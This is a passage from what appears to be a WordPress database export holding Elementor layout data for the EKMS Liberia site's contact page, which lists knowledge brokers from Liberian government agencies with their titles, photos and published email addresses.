Enforcement\\nEPA\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Daoda S. Carlon <\\/strong><br \\/>Assistant Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:carlonbaindu@gmail.com\\\">carlonbaindu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4031f43\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kn.png\",\"id\":3330}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b606ac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/edward.png\",\"id\":3334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konikay Nimely<\\/strong><br \\/>EIA Manager, FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Edward S. Kamara<\\/strong><br>\\n\\nMarketing and Forest Forecast<br>\\n\\n<a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Blamah Goll<\\/strong><br>\\nConservation Manager, FDA<br>\\n<a href=\\\"mailto:blamag@gmail.com\\\">blamag@gmail.com<\\/a><br>\\n<a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"32bbf7d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/francis-2.png\",\"id\":3340}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"781a85f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/Uriah.png\",\"id\":3347}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Francis W. Mwah<\\/strong><\\/p><p>Director, MOA<\\/p><p><a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John Willabo Johnson <\\/strong><br>\\n\\nAssistant Minister, MME<br>\\n\\n<a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Uriah Garsinii <\\/strong><br \\/>Land Use Management Manager, LLA<br \\/><a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/mr-wesseh.png\",\"id\":3367},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Aaron S.M. Wesseh<\\/strong><br>\\n\\nManager, CCCD Project<br>\\n\\n<a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director, MOCI<br \\/>Division of Foreign Trade<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer, MOCI<br \\/>National Standard Laboratory<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f37529a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/golafale.png\",\"id\":3351}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards, MOCI<br \\/>Bureau of Industrial Services<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer, MOCI<br \\/>Division of Knowledge Management &amp; Archive<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Ahmed Sheriff <\\/strong><br \\/>Director, NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d1d7c9e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/yokie.png\",\"id\":3355}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea090e8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kumeh.png\",\"id\":3360}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Anthony Yokie<\\/strong><br \\/>Manager, NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea61b10\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Tonia Boah <\\/strong><br \\/>NaFAA<br \\/>Monitoring, Control, and Surveillance Field Officer <\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d2a5e3d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce Kumeh<\\/strong><br \\/>NaFAA<br \\/>Small Scale Fisheries Officer<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b10d67e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/lavalah.png\",\"id\":3364}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a3814ef\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6765846\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7bc5a8c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"87f3106\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(23331,3388,'_elementor_edit_mode','builder'),(23332,3388,'_elementor_template_type','wp-page'),(23333,3388,'_elementor_version','3.0.16'),(23334,3388,'_wp_page_template','default'),(23335,3388,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/jallah.png\",\"id\":3371},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer\\/UNCBD Focal Point<br \\/>jcammue@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator\\/UNFCCC Focal Point<br 